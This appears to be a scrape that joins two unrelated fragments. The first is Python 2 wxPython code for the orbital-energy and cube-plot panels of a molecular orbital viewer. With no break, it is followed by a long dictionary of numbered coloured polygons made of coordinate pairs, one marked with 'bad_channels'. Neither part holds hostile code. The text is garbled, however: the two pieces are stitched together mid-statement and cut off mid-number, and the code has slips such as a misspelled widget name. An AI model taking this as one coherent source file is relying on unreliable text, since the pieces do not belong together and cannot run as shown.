self.btndraw=wx.Button(self.panel,wx.ID_ANY,"Draw",pos=(xloc+40,yloc),size=(45,20)) self.btndraw.Bind(wx.EVT_BUTTON,self.OnDraw) self.btndraw.SetToolTipString('Draw cube data(toggle "on" and "off")') def CreateOrbitalPanel(self,idata): size=self.GetClientSize() w=size[0]; h=size[1] w=self.orbitalpanwidth xpanpos=self.plotterpanwidth+idata*self.orbitalpanwidth ff='%5.0f' # upper panel id=wx.NewId() panel=wx.Panel(self,id,pos=(xpanpos,0),size=(w,h)) #ysize)) panel.SetBackgroundColour(self.bgcolor) self.widgetiddic[id]=[idata,'Panel',panel] # cubedata yloc=5; xloc=15 #sttit=wx.StaticText(panel,-1,label=self.orbtitle[idata],pos=(xloc,yloc),size=(w-10,18)) id=wx.NewId() label=wx.StaticText(panel,id,label=self.orbtitle[idata],pos=(xloc,yloc),size=(w-10,18)) self.widgetiddic[id]=[idata,'Label',label] label.Bind(wx.EVT_LEFT_DOWN,self.OnOrbTitleLeftClick) label.SetToolTipString('L-Click to be avtive') wx.StaticLine(panel,pos=(0,0),size=(4,h),style=wx.LI_VERTICAL) #ststit.SetToolTipString('Choose drawing style') yloc += 25 self.wplt=self.orbitalpanwidth-25 #90; self.hplt=125 id=wx.NewId() orbgraph=graph.EnergyGraph(panel,id,[xloc,yloc],[self.wplt,self.hplt],'white',retobj=self) #yloc += 25 orbgraph.SetToolTipString('L-Click a bar for select. L-Drag for move plot window') self.widgetiddic[id]=[idata,'Graph',orbgraph] # yloc += self.hplt+10 id=wx.NewId() btnrdc=wx.Button(panel,id,"<",pos=(xloc,yloc),size=(20,20)) btnrdc.Bind(wx.EVT_BUTTON,self.OnOrbReduce) btnrdc.SetToolTipString('"<" ("<") key press also reduces/magnifies') btnrdc.Bind(wx.EVT_KEY_DOWN,self.OnOrbKeyDown) self.widgetiddic[id]=[idata,'Reduce',btnrdc] id=wx.NewId() btnmag=wx.Button(panel,id,">",pos=(xloc+25,yloc),size=(20,20)) btnmag.Bind(wx.EVT_BUTTON,self.OnOrbMagnify) self.widgetiddic[id]=[idata,'Magnify',btnmag] btnmag.SetToolTipString('"<" ("<") key press also reduces/magnifies') btnmag.Bind(wx.EVT_KEY_DOWN,self.OnOrbKeyDown) id=wx.NewId() btnset=wx.Button(panel,id,"Reset",pos=(xloc+50,yloc),size=(40,20)) btnset.Bind(wx.EVT_BUTTON,self.OnOrbReset) btnset.SetToolTipString('Reset draw size') self.widgetiddic[id]=[idata,'Reset',btnset] yloc += 25 wx.StaticLine(panel,pos=(-1,yloc),size=(w,2),style=wx.LI_HORIZONTAL) yloc += 8 storb=wx.StaticText(panel,-1,label='Orb:',pos=(xloc,yloc),size=(30,18)) id=wx.NewId() tcorb=wx.TextCtrl(panel,id,str(self.homoorbnmblst[idata]),pos=(xloc+30,yloc),size=(35,18), style=wx.TE_PROCESS_ENTER) tcorb.Bind(wx.EVT_TEXT_ENTER,self.OnEnterOrbitalNumber) tcorb.SetToolTipString('Input orbital number and "ENTER"') self.widgetiddic[id]=[idata,'Orb',tcorb] id=wx.NewId() btnab=wx.ToggleButton(panel,id,'',pos=(xloc+70,yloc),size=(20,20)) btnab.Bind(wx.EVT_TOGGLEBUTTON,self.OnOrbSpin) btnab.SetToolTipString('Toggle switch for select alpha or beta orbitals(open shell only') self.widgetiddic[id]=[idata,'Spin',btnab] try: if len(self.data) == 1: btnab.Disable() else: self.spin[idata]='a' btnab.SetLabel(self.spin[idata]) btnab.Refresh() except: pass yloc += 25 sthom=wx.StaticText(panel,-1,label='HOMO -',pos=(xloc,yloc),size=(45,18)) id=wx.NewId() schom=wx.SpinCtrl(panel,id,value=str(self.homominus[idata]),pos=(xloc+45,yloc),size=(45,18), style=wx.SP_ARROW_KEYS,min=self.minhomo[idata],max=self.maxhomo[idata]) schom.Bind(wx.EVT_SPINCTRL,self.OnOrbHOMO) schom.SetToolTipString('Set orbital number relative to HOMO') self.widgetiddic[id]=[idata,'HOMO',schom] yloc += 25 stlum=wx.StaticText(panel,-1,label='LUMO +',pos=(xloc,yloc),size=(45,18)) id=wx.NewId() sclum=wx.SpinCtrl(panel,id,value=str(self.lumoplus[idata]),pos=(xloc+45,yloc),size=(45,18), style=wx.SP_ARROW_KEYS,min=self.minlumo[idata],max=self.maxlumo[idata]) sclum.SetToolTipString('Set orbital number relative to LUMO') sclum.Bind(wx.EVT_SPINCTRL,self.OnOrbLUMO) self.widgetiddic[id]=[idata,'LUMO',sclum] yloc += 25 id=wx.NewId() btncls=wx.Button(panel,id,"Close",pos=(xloc-5,yloc),size=(45,20)) btncls.Bind(wx.EVT_BUTTON,self.OnOrbClose) btncls.SetToolTipString('Close this panel') self.widgetiddic[id]=[idata,'Close',btncls] id=wx.NewId() btnapl=wx.Button(panel,id,"Aplly",pos=(xloc+50,yloc),size=(45,20)) btnapl.Bind(wx.EVT_BUTTON,self.OnOrbApply) btnapl.SetToolTipString('Apply the orbital specified in "Orb" for draw') self.widgetiddic[id]=[idata,'Aplly',btnapl] # self.SetOrbLabelColor(self.curdata) #self.PlotEnergy() #self.RefreshGraphPanel() def OnOrbTitleLeftClick(self,event): id=event.GetId() self.curdata=self.widgetiddic[id][0] print 'id,curdata',id,self.curdata self.SetOrbLabelColor(self.curdata) event.Skip() def PlotEnergy(self): for id,lst in self.widgetiddic.iteritems(): if lst[1] == 'Graph': lst[2].SetYRange(self.erangemin,self.erangemax) lst[2].SetData(self.orbitallst[lst[0]]) #lst[2].SetYAxisLabel('Energy (ev)') lst[2].Plot(True) def RefreshGraphPanel(self): for id,lst in self.widgetiddic.iteritems(): if lst[1] == 'Panel': lst[2].Refresh(); lst[2].Update() # for orbital energy panel def OnOrbSpin(self,event): id=event.GetId() value=self.widgetiddic[id][2].GetValue() if value: label='a' else: label='b' self.widgetiddic[id][2].SetLabel(label) self.spin[self.widgetiddic[id][0]]=value def SetLabelToSpinButton(self,idata,label): for id,lst in self.widgetiddic.iteritems(): if lst[1] == 'Spin': if lst[0] == idata: lst[2].SetLabel(label) break def GetLabelOnSpinButton(self,idata): label='' for id,lst in self.widgetiddic.iteritems(): if lst[1] == 'Spin': if lst[0] == idata: label=lst[2].GetLabel() break return label def OnOrbKeyDown(self,event): # ascii:44:'<',46:'>', unicode: 60:'<',62:'>' keycode=event.GetKeyCode() if keycode == 46: self.ZoomEnergyGraph(self.curdata,True) elif keycode == 44: self.ZoomEnergyGraph(self.curdata,False) def OnOrbMagnify(self,event): id=event.GetId() idata=self.widgetiddic[id][0] self.SetOrbLabelColor(idata) self.ZoomEnergyGraph(idata,True) def GetGraphObj(self,idata): graphobj=None for id,lst in self.widgetiddic.iteritems(): if lst[1] == 'Graph' and lst[0] == idata: graphobj=lst[2]; break return graphobj def OnOrbReduce(self,event): id=event.GetId() idata=self.widgetiddic[id][0] self.SetOrbLabelColor(idata) # self.ZoomEnergyGraph(idata,False) def ZoomEnergyGraph(self,idata,magnify): graphobj=self.GetGraphObj(idata) # ymin,ymax=graphobj.GetYRange() yinc=1.0 if magnify: ymin += yinc; ymax -= yinc else: ymin -= yinc; ymax += yinc # graphobj.SetYRange(ymin,ymax) graphobj.Plot(True) def SetFocusOnOrbPanel(self,idata): print 'SetFocuson',idata for id,lst in self.widgetiddic.iteritems(): if lst[1] == 'Panel' and lst[0] == idata: panel=lst[2]; break panel.SetFocus() def SetOrbLabelColor(self,idata): # widgetiddic:{id:[idata,label,obj],...} for id,lst in self.widgetiddic.iteritems(): if lst[1] == 'Label': if lst[0] == idata: color='red' else: color='black' lst[2].SetForegroundColour(color) lst[2].Refresh() self.curdata=idata def OnOrbReset(self,event): # reset energy graph color graphobj=self.GetGraphObj(self.curdata) # ymin=self.erangemin ymax=self.erangemax graphobj.SetYRange(ymin,ymax) graphobj.Plot(True) def OnOrbApply(self,event): id=event.GetId() idata=self.widgetiddic[id][0] self.SetOrbLabelColor(idata) value=0 for id,lst in self.widgetiddic.iteritems(): if lst[1] == 'Orb' and lst[0] == idata: value=lst[2].GetValue() break print 'value in Apply',value def OnOrbClose(self,event): id=event.GetId() idata=self.curdata #self.widgetiddic[id][0] pos=self.GetPosition() try: del self.orbitallst[idata] except: pass self.parent.orbobj.SetOrbitalList(self.orbitallst) self.Destroy() self.parent.orbobj.OpenDrawOrbitalWin(self.orbitallst) self.SetPosition(pos) def GetOrbitalNumberInTC(self): idata=self.curdata for id,lst in self.widgetiddic.iteritems(): if lst[1] == 'Orb' and lst[0] == idata: orbnmb=lst[2].GetValue() orbnmb=int(orbnmb) return orbnmb def OnEnterOrbitalNumber(self,event): id=event.GetId() idata=self.widgetiddic[id][0] self.SetOrbLabelColor(idata) value=self.widgetiddic[id][2].GetValue() self.SetOrbValueToHOMOLUMO(idata,int(value)) def OnOrbHOMO(self,event): id=event.GetId() idata=self.widgetiddic[id][0] self.SetOrbLabelColor(idata) value=self.widgetiddic[id][2].GetValue() orbnmb=self.homoorbnmblst[idata]-value if orbnmb <= 1: orbnmb=1 self.SetOrbValueToOrbTC(idata,orbnmb) def SetOrbValueToHOMOLUMO(self,idata,value): homo=self.homoorbnmblst[idata] lumo=homo+1 for id,lst in self.widgetiddic.iteritems(): if lst[1] == 'HOMO' and lst[0] == idata: sval=homo-value if sval < 0: sval=0 lst[2].SetValue(sval) lst[2].Refresh() if lst[1] == 'LUMO' and lst[0] == idata: sval=value-lumo if sval < 0: sval=0 lst[2].SetValue(sval) lst[2].Refresh() def SetOrbValueToOrbTC(self,idata,orbnmb): for id,lst in self.widgetiddic.iteritems(): if lst[1] == 'Orb' and lst[0] == idata: lst[2].SetValue(str(orbnmb)) lst[2].Refresh() self.SetOrbValueToHOMOLUMO(idata,orbnmb) label=self.GetLabelOnSpinButton(idata) if label == 'a': spin=0 elif label == 'b': spin=1 else: spin=-1 graphobj=self.GetGraphObj(idata) graphobj.SelectOrbital(spin,orbnmb) def SelectedOrbFromEnergyGraph(self,spin,orbnmb): self.SetOrbValueToOrbTC(self.curdata,orbnmb) if spin == 0: label='a' elif spin == 1: label='b' else: label='' self.SetLabelToSpinButton(self.curdata,label) def OnOrbLUMO(self,event): id=event.GetId() idata=self.widgetiddic[id][0] self.SetOrbLabelColor(idata) value=self.widgetiddic[id][2].GetValue() orbnmb=self.homoorbnmblst[idata]+1+value if orbnmb > self.maxorbnmblst[idata]: orbnmb=self.maxorbnmblst[idata] self.SetOrbValueToOrbTC(idata,orbnmb) # for cube plotter panel def OnDel(self,event): if len(self.objectlst) <= 1: # can not delete but close all return object=self.ckbobj.GetValue().strip() # remove plot try: idx=self.objectlst.index(object) except: pass if idx >= 1: del self.objectlst[idx] self.ckhobj.SetValue(self.objectlst[idx-1]) def OnObject(self,event): print 'curobj',self.curobj self.curobj=self.ckbobj.GetValue().strip() def OnSuperimpose(self,event): self.superimpose=self.ckbimp.GetValue() print 'superimpose',self.superimpose def GetCubeFileAndMakeCubeObjDic(self): filename=self.viewer.GetCubeFile() if os.path.exists(filename): base,ext=os.path.splitext(filename) self.cubefile=filename if ext == '.den' or ext == '.mep' or ext == '.cub': err=self.AddToCubeObjDic(filename) else: mess='The file "'+filename+'" is not cube data (ext should be ".mep" or ".den"' lib.MessageBoxOK(mess,"") self.OnClose(1) else: mess='Cube file is not found. filename="'+filename+'"' lib.MessageBoxOK(mess,"") self.OnClose(1) def GetDrawPanelParams(self): #self.ondraw=self.btndraw.GetValue() return [self.style,self.value,self.interpol,self.colorpos,self.colorneg, self.opacity,self.ondraw] def SetDrawPanelParams(self,params): self.style=params[0]; self.value=params[1]; self.interpol=params[2] self.colorpos=params[3]; self.colorneg=params[4]; self.opacity=params[5] self.ondraw=params[6] self.SetParamsToWidgets() def SetParamsToWidgets(self): self.rbtsold.SetValue(True) if self.style == 1: self.rbtwire.SetValue(True) self.tcval.SetValue(str(self.value)) self.spip.SetValue(self.interpol) self.cbcolp.SetValue(self.colorpos) #StringSelection(self.colorpos) self.cbcoln.SetValue(self.colorneg)
-0.337218966457), (-0.646195113652, -0.33706657095), (-0.651832284777, -0.336912175174), (-0.657460070718, -0.336755757338), (-0.663078327691, -0.336597294951), (-0.668686909161, -0.336436764791), (-0.674285665754, -0.336274142883), (-0.67987444516, -0.336109404467), (-0.685453092043, -0.335942523975), (-0.691021447941, -0.335773474994), (-0.696579351168, -0.335602230244), (-0.702126636711, -0.335428761544), (-0.707663136126, -0.335253039779), (-0.713188677433, -0.335075034873), (-0.718703085006, -0.334894715749), (-0.724206179462, -0.334712050303), (-0.729697777548, -0.334527005364), (-0.735177692023, -0.334339546661), (-0.74064573154, -0.33414963879), (-0.746101700528, -0.333957245169), (-0.751545399061, -0.333762328011), (-0.756976622739, -0.333564848278), (-0.762395162555, -0.333364765644), (-0.767800804765, -0.333162038458), (-0.773193330752, -0.332956623698), (-0.778572516889, -0.332748476935), (-0.783938134403, -0.332537552286), (-0.789289949229, -0.332323802375), (-0.794627721865, -0.332107178286), (-0.799951207224, -0.331887629519), (-0.800061826877, -0.329067305958), (-0.800171433161, -0.326245745465), (-0.800280027946, -0.323422960291), (-0.800387613092, -0.32059896265), (-0.800494190456, -0.317773764719), (-0.800599761888, -0.31494737864), (-0.800704329231, -0.312119816518), (-0.800807894323, -0.309291090424), (-0.800910458993, -0.306461212392), (-0.801012025066, -0.303630194427), (-0.801112594355, -0.300798048496), (-0.80121216867, -0.297964786535), (-0.801310749808, -0.295130420449), (-0.801408339562, -0.292294962109), (-0.801504939714, -0.289458423355), (-0.801600552037, -0.286620815998), (-0.801695178296, -0.283782151816), (-0.801788820245, -0.280942442558), (-0.801881479629, -0.278101699945), (-0.801973158184, -0.275259935665), (-0.802063857634, -0.272417161382), (-0.802153579693, -0.269573388726), (-0.802242326064, -0.266728629303), (-0.802330098439, -0.26388289469), (-0.802416898499, -0.261036196436), (-0.802502727912, -0.258188546063), (-0.802587588336, -0.255339955066), (-0.802671481416, -0.252490434913), (-0.802754408783, -0.249639997048), (-0.802836372059, -0.246788652886), (-0.802917372849, -0.243936413817), (-0.802997412748, -0.241083291206), (-0.79764025035, -0.241234499334), (-0.79226904346, -0.24138372094), (-0.786884040618, -0.241530994487), (-0.781485484466, -0.241676356932), (-0.776073611906, -0.241819843776), (-0.770648654251, -0.241961489114), (-0.765210837369, -0.242101325684), (-0.759760381837, -0.242239384909), (-0.754297503078, -0.242375696948), (-0.748822411508, -0.242510290738), (-0.74333531267, -0.242643194038), (-0.737836407371, -0.242774433474), (-0.732325891817, -0.242904034577), (-0.726803957741, -0.243032021826), (-0.721270792533, -0.243158418691), (-0.715726579366, -0.243283247663), (-0.710171497315, -0.243406530303), (-0.704605721484, -0.243528287271), (-0.699029423118, -0.243648538363), (-0.693442769724, -0.243767302551), (-0.687845925177, -0.243884598012), (-0.682239049841, -0.244000442164), (-0.676622300667, -0.244114851695), (-0.670995831307, -0.244227842601), (-0.665359792212, -0.244339430211), (-0.659714330739, -0.244449629216), (-0.654059591243, -0.244558453705), (-0.648395715183, -0.244665917183), (-0.642722841208, -0.244772032609), (-0.637041105256, -0.244876812412), (-0.631350640639, -0.244980268524), (-0.625651578135, -0.245082412402)]}, 30: {'color': 'skyblue', 'polygon': [(0.788068525473, -0.145310501727), (0.788023290986, -0.148190934934), (0.787977160072, -0.151070866231), (0.787930131991, -0.153950285308), (0.787882205996, -0.156829181827), (0.787833381333, -0.159707545422), (0.787783657241, -0.162585365701), (0.787733032954, -0.165462632241), (0.787681507698, -0.168339334593), (0.787629080695, -0.171215462277), (0.787575751162, -0.174091004786), (0.787521518309, -0.176965951583), (0.787466381342, -0.1798402921), (0.787410339463, -0.182714015741), (0.787353391869, -0.185587111879), (0.787295537754, -0.188459569858), (0.787236776306, -0.191331378991), (0.787177106714, -0.194202528559), (0.787116528159, -0.197073007814), (0.787055039824, -0.199942805975), (0.786992640886, -0.202811912233), (0.786929330521, -0.205680315745), (0.786865107905, -0.208548005637), (0.786799972212, -0.211414971004), (0.786733922613, -0.21428120091), (0.786666958282, -0.217146684385), (0.786599078389, -0.220011410428), (0.786530282108, -0.222875368008), (0.78646056861, -0.225738546059), (0.786389937069, -0.228600933484), (0.786318386661, -0.231462519155), (0.786245916561, -0.23432329191), (0.78617252595, -0.237183240557), (0.78078038121, -0.237333277422), (0.775375635617, -0.23748105218), (0.769958431125, -0.237626635267), (0.764528910058, -0.237770093694), (0.759087215015, -0.237911491176), (0.753633488771, -0.238050888263), (0.748167874187, -0.238188342468), (0.742690514127, -0.238323908386), (0.737201551369, -0.238457637814), (0.731701128528, -0.238589579865), (0.726189387981, -0.238719781082), (0.720666471795, -0.238848285543), (0.715132521656, -0.23897513497), (0.709587678806, -0.239100368829), (0.704032083979, -0.239224024427), (0.698465877342, -0.239346137011), (0.692889198443, -0.239466739859), (0.687302186152, -0.239585864369), (0.681704978617, -0.239703540148), (0.676097713213, -0.239819795095), (0.6704805265, -0.239934655482), (0.664853554184, -0.240048146032), (0.659216931071, -0.240160289996), (0.653570791039, -0.240271109228), (0.647915267001, -0.240380624251), (0.642250490872, -0.240488854331), (0.636576593544, -0.240595817537), (0.630893704857, -0.240701530812), (0.625201953577, -0.240806010026), (0.619501467371, -0.240909270041), (0.61379237279, -0.241011324765), (0.608074795251, -0.241112187208), (0.608124854535, -0.238201081017), (0.608174276135, -0.235289251871), (0.608223061095, -0.232376709583), (0.608271210445, -0.229463463933), (0.608318725206, -0.226549524669), (0.608365606382, -0.223634901512), (0.608411854968, -0.220719604148), (0.608457471945, -0.217803642236), (0.608502458281, -0.214887025405), (0.608546814934, -0.211969763253), (0.608590542846, -0.209051865349), (0.608633642949, -0.206133341233), (0.608676116162, -0.203214200415), (0.60871796339, -0.20029445238), (0.608759185527, -0.197374106581), (0.608799783455, -0.194453172443), (0.608839758042, -0.191531659366), (0.608879110144, -0.188609576721), (0.608917840604, -0.185686933852), (0.608955950255, -0.182763740075), (0.608993439915, -0.179840004683), (0.609030310391, -0.176915736938), (0.609066562476, -0.173990946082), (0.609102196951, -0.171065641326), (0.609137214587, -0.168139831859), (0.60917161614, -0.165213526846), (0.609205402354, -0.162286735426), (0.609238573962, -0.159359466713), (0.609271131683, -0.1564317298), (0.609303076224, -0.153503533756), (0.609334408281, -0.150574887625), (0.609365128536, -0.147645800431), (0.615099847591, -0.147585647078), (0.620826243251, -0.147524833585), (0.626544189246, -0.147463351981), (0.632253557801, -0.147401193464), (0.637954219638, -0.147338348346), (0.64364604397, -0.147274805997), (0.649328898505, -0.147210554781), (0.65500264945, -0.147145581994), (0.660667161514, -0.147079873799), (0.666322297914, -0.147013415155), (0.671967920381, -0.146946189749), (0.677603889177, -0.146878179921), (0.683230063097, -0.146809366588), (0.68884629949, -0.146739729165), (0.694452454271, -0.146669245483), (0.700048381941, -0.146597891705), (0.705633935604, -0.146525642239), (0.711208966993, -0.146452469644), (0.716773326491, -0.146378344542), (0.722326863159, -0.146303235515), (0.727869424768, -0.146227109011), (0.733400857824, -0.146149929236), (0.73892100761, -0.14607165805), (0.744429718219, -0.145992254857), (0.749926832595, -0.14591167649), (0.755412192571, -0.145829877097), (0.760885638925, -0.145746808017), (0.766347011415, -0.145662417659), (0.771796148842, -0.14557665137), (0.777232889097, -0.14548945131), (0.782657069222, -0.145400756307), (0.788068525473, -0.145310501727)]}, 31: {'color': 'skyblue', 'polygon': [(0.596197771756, -0.147747435163), (0.596169756351, -0.150679304635), (0.596141147159, -0.153610735294), (0.596111943517, -0.156541718187), (0.596082144753, -0.159472244338), (0.596051750182, -0.162402304749), (0.596020759105, -0.1653318904), (0.595989170813, -0.168260992245), (0.595956984584, -0.171189601216), (0.595924199684, -0.174117708222), (0.595890815366, -0.177045304146), (0.595856830872, -0.179972379847), (0.595822245431, -0.182898926157), (0.595787058259, -0.185824933886), (0.595751268562, -0.188750393816), (0.595714875532, -0.191675296702), (0.595677878348, -0.194599633275), (0.595640276177, -0.197523394238), (0.595602068175, -0.200446570265), (0.595563253485, -0.203369152006), (0.595523831235, -0.206291130081), (0.595483800544, -0.209212495082), (0.595443160517, -0.212133237574), (0.595401910247, -0.215053348093), (0.595360048812, -0.217972817144), (0.595317575281, -0.220891635206), (0.595274488708, -0.223809792727), (0.595230788136, -0.226727280124), (0.595186472593, -0.229644087786), (0.595141541097, -0.232560206072), (0.595095992652, -0.235475625308), (0.595049826249, -0.238390335793), (0.595003040867, -0.241304327791), (0.589258429729, -0.241405089031), (0.583505861081, -0.241504708082), (0.5777454541, -0.241603193966), (0.571977326763, -0.241700555105), (0.566201595834, -0.24179679936), (0.560418376867, -0.24189193407), (0.554627784202, -0.241985966089), (0.548829930961, -0.242078901823), (0.543024929057, -0.24217074726), (0.537212889187, -0.242261508006), (0.531393920844, -0.242351189311), (0.525568132315, -0.242439796106), (0.519735630692, -0.24252733302), (0.513896521875, -0.242613804416), (0.508050910583, -0.24269921441), (0.502198900361, -0.242783566895), (0.496340593594, -0.242866865567), (0.490476091511, -0.242949113943), (0.484605494204, -0.243030315379), (0.478728900637, -0.243110473095), (0.472846408658, -0.243189590184), (0.466958115018, -0.243267669637), (0.461064115382, -0.243344714353), (0.455164504346, -0.243420727153), (0.449259375452, -0.243495710797), (0.443348821208, -0.243569667994), (0.437432933102, -0.243642601413), (0.431511801619, -0.243714513695), (0.425585516264, -0.243785407463), (0.419654165577, -0.243855285328), (0.413717837152, -0.243924149901), (0.40777661766, -0.243992003797), (0.407805338869, -0.241045639265), (0.407833675623, -0.238098609115), (0.407861628376, -0.235150922205), (0.407889197571, -0.232202587363), (0.407916383642, -0.229253613395), (0.407943187014, -0.226304009076), (0.407969608103, -0.22335378316), (0.407995647314, -0.220402944372), (0.408021305045, -0.217451501414), (0.408046581684, -0.214499462962), (0.408071477611, -0.211546837667), (0.408095993197, -0.208593634158), (0.408120128805, -0.205639861037), (0.408143884788, -0.202685526886), (0.408167261494, -0.19973064026), (0.408190259261, -0.196775209694), (0.40821287842, -0.193819243699), (0.408235119293, -0.190862750764), (0.408256982196, -0.187905739357), (0.408278467437, -0.184948217924), (0.408299575317, -0.181990194889), (0.40832030613, -0.179031678656), (0.408340660162, -0.176072677608), (0.408360637693, -0.17311320011), (0.408380238997, -0.170153254503), (0.408399464339, -0.167192849113), (0.408418313981, -0.164231992244), (0.408436788176, -0.161270692183), (0.408454887171, -0.158308957198), (0.408472611207, -0.15534679554), (0.408489960521, -0.15238421544), (0.408506935342, -0.149421225114), (0.414460968763, -0.149378297906), (0.420410187231, -0.149334766989), (0.426354507504, -0.149290632092), (0.432293845442, -0.149245893022), (0.438228115982, -0.149200549659), (0.444157233114, -0.149154601942), (0.450081109854, -0.149108049869), (0.455999658224, -0.149060893486), (0.461912789221, -0.149013132873), (0.467820412799, -0.148964768139), (0.473722437842, -0.148915799406), (0.479618772139, -0.148866226801), (0.485509322365, -0.148816050438), (0.491393994053, -0.148765270405), (0.497272691572, -0.148713886748), (0.503145318109, -0.148661899455), (0.50901177564, -0.148609308434), (0.514871964914, -0.148556113501), (0.520725785428, -0.148502314349), (0.526573135412, -0.148447910537), (0.532413911801, -0.148392901456), (0.538248010221, -0.148337286312), (0.54407532497, -0.148281064096), (0.549895748999, -0.148224233559), (0.555709173893, -0.148166793179), (0.561515489857, -0.148108741132), (0.567314585699, -0.148050075261), (0.573106348814, -0.14799079304), (0.578890665172, -0.147930891536), (0.584667419306, -0.147870367379), (0.590436494295, -0.147809216714), (0.596197771756, -0.147747435163)]}, 32: {'color': 'skyblue', 'polygon': [(0.394696633387, -0.149424365211), (0.39467879205, -0.152389107312), (0.394660590174, -0.155353441224), (0.39464202756, -0.158317358771), (0.394623104005, -0.161280851758), (0.394603819299, -0.164243911975), (0.394584173229, -0.167206531192), (0.394564165574, -0.170168701163), (0.394543796107, -0.173130413623), (0.394523064596, -0.176091660289), (0.394501970803, -0.179052432857), (0.394480514483, -0.182012723007), (0.394458695386, -0.184972522396), (0.394436513253, -0.187931822663), (0.394413967821, -0.190890615426), (0.394391058819, -0.193848892282), (0.39436778597, -0.196806644806), (0.394344148987, -0.199763864555), (0.39432014758, -0.20272054306), (0.394295781449, -0.205676671831), (0.394271050286, -0.208632242358), (0.394245953779, -0.211587246106), (0.394220491604, -0.214541674516), (0.394194663432, -0.217495519008), (0.394168468923, -0.220448770977), (0.394141907732, -0.223401421792), (0.394114979504, -0.226353462801), (0.394087683875, -0.229304885326), (0.394060020473, -0.232255680662), (0.394031988917, -0.235205840081), (0.394003588818, -0.238155354828), (0.393974819775, -0.241104216123), (0.39394568138, -0.24405241516), (0.387988826095, -0.244113658438), (0.382027443425, -0.244173901337), (0.376061615455, -0.244233146634), (0.370091423476, -0.244291397143), (0.364116948003, -0.244348655716), (0.358138268797, -0.244404925244), (0.352155464887, -0.244460208662), (0.346168614593, -0.244514508946), (0.340177795542, -0.244567829116), (0.334183084698, -0.244620172234), (0.328184558374, -0.244671541407), (0.322182292262, -0.244721939783), (0.31617636145, -0.244771370553), (0.310166840442, -0.244819836947), (0.304153803183, -0.244867342234), (0.298137323079, -0.244913889719), (0.292117473015, -0.244959482741), (0.286094325382, -0.245004124671), (0.280067952089, -0.245047818907), (0.274038424593, -0.245090568876), (0.268005813911, -0.245132378023), (0.261970190647, -0.245173249815), (0.255931625004, -0.245213187735), (0.249890186813, -0.245252195273), (0.243845945542, -0.245290275932), (0.237798970324, -0.245327433216), (0.23174932997, -0.245363670627), (0.22569709299, -0.245398991664), (0.219642327608, -0.245433399816), (0.213585101786, -0.24546689856), (0.207525483234, -0.245499491352), (0.201463539431, -0.245531181626), (0.201477818585, -0.242564995643), (0.201491914957, -0.239598171491), (0.201505828577, -0.236630717497), (0.201519559473, -0.23366264197), (0.201533107671, -0.230693953198), (0.201546473191, -0.227724659447), (0.20155965605, -0.224754768965), (0.201572656261, -0.221784289979), (0.201585473836, -0.218813230697), (0.201598108781, -0.215841599308), (0.201610561102, -0.212869403982), (0.2016228308, -0.209896652871), (0.201634917874, -0.206923354109), (0.201646822321, -0.203949515811), (0.201658544135, -0.200975146076), (0.201670083307, -0.198000252984), (0.201681439828, -0.195024844598), (0.201692613685, -0.192048928966), (0.201703604864, -0.189072514119), (0.201714413349, -0.186095608071), (0.201725039124, -0.18311821882), (0.201735482168, -0.180140354351), (0.201745742461, -0.17716202263), (0.201755819982, -0.174183231612), (0.201765714708, -0.171203989235), (0.201775426614, -0.168224303422), (0.201784955677, -0.165244182085), (0.20179430187, -0.16226363312), (0.201803465167, -0.159282664409), (0.20181244554, -0.156301283824), (0.201821242963, -0.153319499222), (0.201829857408, -0.150337318447), (0.207903619892, -0.150317575824), (0.213975054514, -0.150297291683), (0.22004409477, -0.150276463224), (0.226110673998, -0.150255087655), (0.232174725369, -0.150233162194), (0.238236181864, -0.150210684078), (0.244294976263, -0.150187650564), (0.250351041124, -0.15016405894), (0.256404308768, -0.150139906528), (0.262454711258, -0.150115190689), (0.268502180383, -0.150089908828), (0.274546647639, -0.150064058401), (0.280588044208, -0.15003763692), (0.286626300941, -0.150010641954), (0.292661348333, -0.14998307114), (0.298693116511, -0.149954922183), (0.304721535203, -0.149926192862), (0.310746533725, -0.149896881033), (0.316768040954, -0.149866984636), (0.322785985312, -0.149836501693), (0.328800294736, -0.149805430318), (0.334810896663, -0.149773768717), (0.340817718003, -0.149741515187), (0.346820685117, -0.149708668125), (0.352819723794, -0.149675226028), (0.358814759226, -0.149641187489), (0.364805715988, -0.149606551206), (0.370792518008, -0.14957131598), (0.376775088549, -0.149535480712), (0.38275335018, -0.149499044408), (0.388727224756, -0.149462006172), (0.394696633387, -0.149424365211)]}, 33: {'bad_channels': [3, 4], 'color': 'red', 'polygon': [(0.187776696458, -0.150607165433), (0.18776770607, -0.153590131409), (0.187758545238, -0.15657270112), (0.187749213998, -0.159554866732), (0.187739712387, -0.1625366204), (0.187730040444, -0.165517954266), (0.187720198203, -0.168498860458), (0.1877101857, -0.171479331092), (0.187700002971, -0.17445935827), (0.18768965005, -0.177438934082), (0.18767912697, -0.180418050601), (0.187668433765, -0.183396699889), (0.187657570465, -0.18637487399), (0.187646537101, -0.189352564936), (0.187635333702, -0.192329764742), (0.187623960297, -0.195306465409), (0.187612416911, -0.19828265892), (0.187600703568, -0.201258337244), (0.187588820293, -0.204233492334), (0.187576767105, -0.207208116123), (0.187564544024, -0.210182200531), (0.187552151066, -0.213155737459), (0.187539588247, -0.216128718789), (0.187526855578, -0.219101136388), (0.18751395307, -0.222072982102), (0.187500880728, -0.225044247762), (0.187487638559, -0.228014925177), (0.187474226562, -0.230985006139), (0.187460644736, -0.233954482419), (0.187446893077, -0.23692334577), (0.187432971575, -0.239891587925), (0.18741888022, -0.242859200596), (0.187404618995, -0.245826175474), (0.1813354856, -0.245852843833), (0.175264315409, -0.245878622804), (0.169191174943, -0.24590351565), (0.163116130592, -0.245927525584), (0.157039248622, -0.245950655761), (0.150960595201, -0.245972909278), (0.1448802364, -0.245994289165), (0.138798238217, -0.246014798386), (0.132714666581, -0.246034439829), (0.12662958737, -0.246053216307), (0.120543066419, -0.246071130552), (0.114455169534, -0.246088185209), (0.108365962504, -0.246104382835), (0.102275511106, -0.246119725897), (0.0961838811234, -0.246134216762), (0.090091138348, -0.246147857701), (0.0839973485942, -0.246160650879), (0.0779025777063, -0.246172598357), (0.0718068915676, -0.246183702088), (0.0657103561079, -0.24619396391), (0.0596130373119, -0.24620338555), (0.0535150012265, -0.246211968616), (0.0474163139672, -0.246219714596), (0.0413170417257, -0.246226624858), (0.0352172507752, -0.246232700644), (0.029117007477, -0.246237943073), (0.0230163782855, -0.246242353134), (0.0169154297535, -0.246245931687), (0.0108142285374, -0.246248679464), (0.00471284140113, -0.246250597063), (-0.00138866477951, -0.246251684949), (-0.00749022301292, -0.246251943455), (-0.00749062418694, -0.243279686236), (-0.0074910204973, 